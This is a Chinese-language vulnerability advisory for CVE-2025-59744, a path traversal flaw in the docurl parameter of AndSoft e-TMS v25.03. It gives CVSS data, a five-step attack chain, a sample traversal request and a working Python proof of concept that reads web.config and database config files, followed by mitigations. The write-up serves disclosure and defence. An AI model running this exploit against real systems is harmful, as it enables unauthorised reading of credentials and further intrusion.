CVE-2025-59744：AndSoft e-TMS路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-59744

漏洞类型

路径遍历（Path Traversal）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59744是AndSoft公司开发的e-TMS（运输管理系统）v25.03版本中存在的一个高危路径遍历漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，CVSS 3.1评分为7.5分，属于高危级别漏洞。

AndSoft e-TMS是一款广泛应用于物流和运输行业的管理系统，用于处理运输订单、车辆调度、文档管理等业务。该漏洞存在于系统的Web应用程序中，具体位于/lib/asp/DOCSAVEASASP.ASP文件中的"docurl"参数处。由于该参数未经过充分的输入验证和过滤，攻击者可以通过构造特殊的路径遍历序列（如"../"）来访问Web根目录下的任意文件。

该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N）也无需用户交互（UI:N），这意味着远程未授权攻击者可以直接利用此漏洞。漏洞对机密性影响为高（C:H），但对完整性和可用性没有直接影响。攻击者可以利用此漏洞读取Web服务器上的敏感配置文件、数据库连接信息、源代码或其他敏感文档，从而为进一步攻击获取关键信息。

此漏洞已于2025年10月2日公开披露，INCIBE同时发布了安全公告，建议受影响的用户及时更新补丁或采取缓解措施。

技术细节

该路径遍历漏洞的根本原因在于AndSoft e-TMS v25.03的/lib/asp/DOCSAVEASASP.ASP文件中，"docurl"参数在处理用户输入时未进行充分的路径规范化或安全过滤。

技术原理：
1. DOCSAVEASASP.ASP是一个用于文档保存/另存为操作的ASP脚本，它接受"docurl"参数来确定文档的存储或读取路径。
2. 正常情况下，该参数应包含相对于特定目录的文件名或路径。
3. 然而，由于缺乏对路径遍历序列（如../、..\、URL编码后的%2e%2e%2f等）的过滤，攻击者可以构造恶意路径来突破预期的目录限制。
4. 虽然漏洞描述指出攻击者只能访问Web根目录下的文件（而非系统任意文件），但这仍然允许读取Web应用程序的配置文件、数据库凭证、源代码等敏感信息。

利用方式：
攻击者可以通过发送特制的HTTP请求来利用此漏洞，例如：
GET /lib/asp/DOCSAVEASASP.ASP?docurl=../../../config/database.config HTTP/1.1
或通过POST方式提交恶意参数。服务器在处理该请求时，会将docurl参数的值直接用于文件操作，从而导致未授权的文件访问。

值得注意的是，该漏洞无需认证即可利用，且无需用户交互，攻击复杂度低，这使得该漏洞容易被自动化工具批量利用，对暴露在互联网上的e-TMS实例构成严重威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、Censys等搜索引擎或直接扫描识别暴露在互联网上的AndSoft e-TMS v25.03实例，确认目标系统的版本和可访问的ASP端点。

STEP 2

步骤2：漏洞探测

攻击者向目标发送正常请求至/lib/asp/DOCSAVEASASP.ASP，确认该端点存在且可访问，并通过分析响应验证docurl参数的处理逻辑。

STEP 3

步骤3：构造恶意请求

攻击者构造包含路径遍历序列（如../）的docurl参数值，尝试读取Web根目录下的敏感文件，如配置文件、数据库连接字符串等。

STEP 4

步骤4：数据提取

服务器返回目标文件的内容，攻击者成功获取敏感信息，包括数据库凭证、系统配置、源代码等。

STEP 5

步骤5：进一步利用

利用获取的敏感信息（如数据库凭证），攻击者可以进一步入侵系统，访问数据库中的业务数据，或进行更深层次的渗透攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59744 - AndSoft e-TMS Path Traversal PoC
# Exploit: Path traversal via "docurl" parameter in DOCSAVEASASP.ASP

import requests

TARGET_URL = "http://target-host/lib/asp/DOCSAVEASASP.ASP"

def exploit_path_traversal(target_url, target_file):
    """
    Exploit path traversal vulnerability to read files within web root.
    The docurl parameter is vulnerable to path traversal sequences.
    """
    # Construct traversal payload to access files within web root
    traversal_payload = "../../../" + target_file
    
    params = {
        "docurl": traversal_payload
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "*/*"
    }
    
    try:
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[+] Successfully accessed: {target_file}")
            print(f"[+] Response content:\n{response.text[:500]}")
            return response.text
        else:
            print(f"[-] Failed to access: {target_file}, Status: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

# Example usage - try to read sensitive files
if __name__ == "__main__":
    # Attempt to read configuration files within web root
    sensitive_files = [
        "web.config",
        "config/database.config",
        "config/app.config",
        "../web.config",
        "../../web.config",
        "../../../web.config"
    ]
    
    for file in sensitive_files:
        print(f"\n[*] Trying to access: {file}")
        exploit_path_traversal(TARGET_URL, file)

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面配置规则，拦截包含路径遍历序列（如../、..%2f、%2e%2e%2f等）的请求；2）通过修改ASP代码对docurl参数进行严格的输入验证，仅允许字母、数字和特定安全字符；3）限制/lib/asp/DOCSAVEASASP.ASP文件的访问权限，仅允许授权用户访问；4）部署WAF规则监控和阻断可疑的路径遍历请求；5）监控Web服务器日志，及时发现异常的文件访问请求。